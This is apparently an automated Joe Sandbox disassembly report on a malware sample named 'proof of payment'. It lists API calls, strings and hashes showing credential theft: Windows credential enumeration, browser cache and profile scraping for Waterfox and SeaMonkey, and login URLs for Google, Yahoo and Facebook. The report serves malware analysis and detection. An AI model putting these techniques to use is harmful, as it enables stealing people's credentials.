                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                      • memset.MSVCRT ref: 00413E07
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                      • API String ID: 912665193-1740548384
                                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                        • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                      • String ID: bhv
                                      • API String ID: 327780389-2689659898
                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2941347001-70141382
                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 651 446755-446758 648->651 650->642 654 44673d-446745 650->654 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 667 446853-446864 GetStartupInfoW 662->667 668 44684d-446851 662->668 663->661 664->660 664->665 665->662 669 446840-446842 665->669 671 446866-44686a 667->671 672 446879-44687b 667->672 668->667 668->669 669->662 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                      • String ID:
                                      • API String ID: 2827331108-0
                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                      • wcschr.MSVCRT ref: 0040C324
                                      • wcschr.MSVCRT ref: 0040C344
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                      • GetLastError.KERNEL32 ref: 0040C373
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                      • String ID: visited:
                                      • API String ID: 1157525455-1702587658
                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                      • memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                      • _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                      • API String ID: 3883404497-2982631422
                                      • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                      • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                      • memset.MSVCRT ref: 0040BC75
                                      • memset.MSVCRT ref: 0040BC8C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                      • memcmp.MSVCRT ref: 0040BCD6
                                      • memcpy.MSVCRT ref: 0040BD2B
                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 509814883-3916222277
                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                      APIs
                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                      • GetLastError.KERNEL32 ref: 0041847E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CreateFile$??3@ErrorLast
                                      • String ID: |A
                                      • API String ID: 1407640353-1717621600
                                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                      • String ID: r!A
                                      • API String ID: 2791114272-628097481
                                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                      • wcslen.MSVCRT ref: 0040C82C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                      • API String ID: 62308376-4196376884
                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                      • memcpy.MSVCRT ref: 0040B60D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                      • String ID: BIN
                                      • API String ID: 1668488027-1015027815
                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                      • wcslen.MSVCRT ref: 0040BE06
                                      • _wcsncoll.MSVCRT ref: 0040BE38
                                      • memset.MSVCRT ref: 0040BE91
                                      • memcpy.MSVCRT ref: 0040BEB2
                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                      • wcschr.MSVCRT ref: 0040BF24
                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                      • String ID:
                                      • API String ID: 3191383707-0
                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00403CBF
                                      • memset.MSVCRT ref: 00403CD4
                                      • memset.MSVCRT ref: 00403CE9
                                      • memset.MSVCRT ref: 00403CFE
                                      • memset.MSVCRT ref: 00403D13
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403DDA
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Waterfox$Waterfox\Profiles
                                      • API String ID: 3527940856-11920434
                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00403E50
                                      • memset.MSVCRT ref: 00403E65
                                      • memset.MSVCRT ref: 00403E7A
                                      • memset.MSVCRT ref: 00403E8F
                                      • memset.MSVCRT ref: 00403EA4
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403F6B
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                      • API String ID: 3527940856-2068335096
                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                      Uniqueness

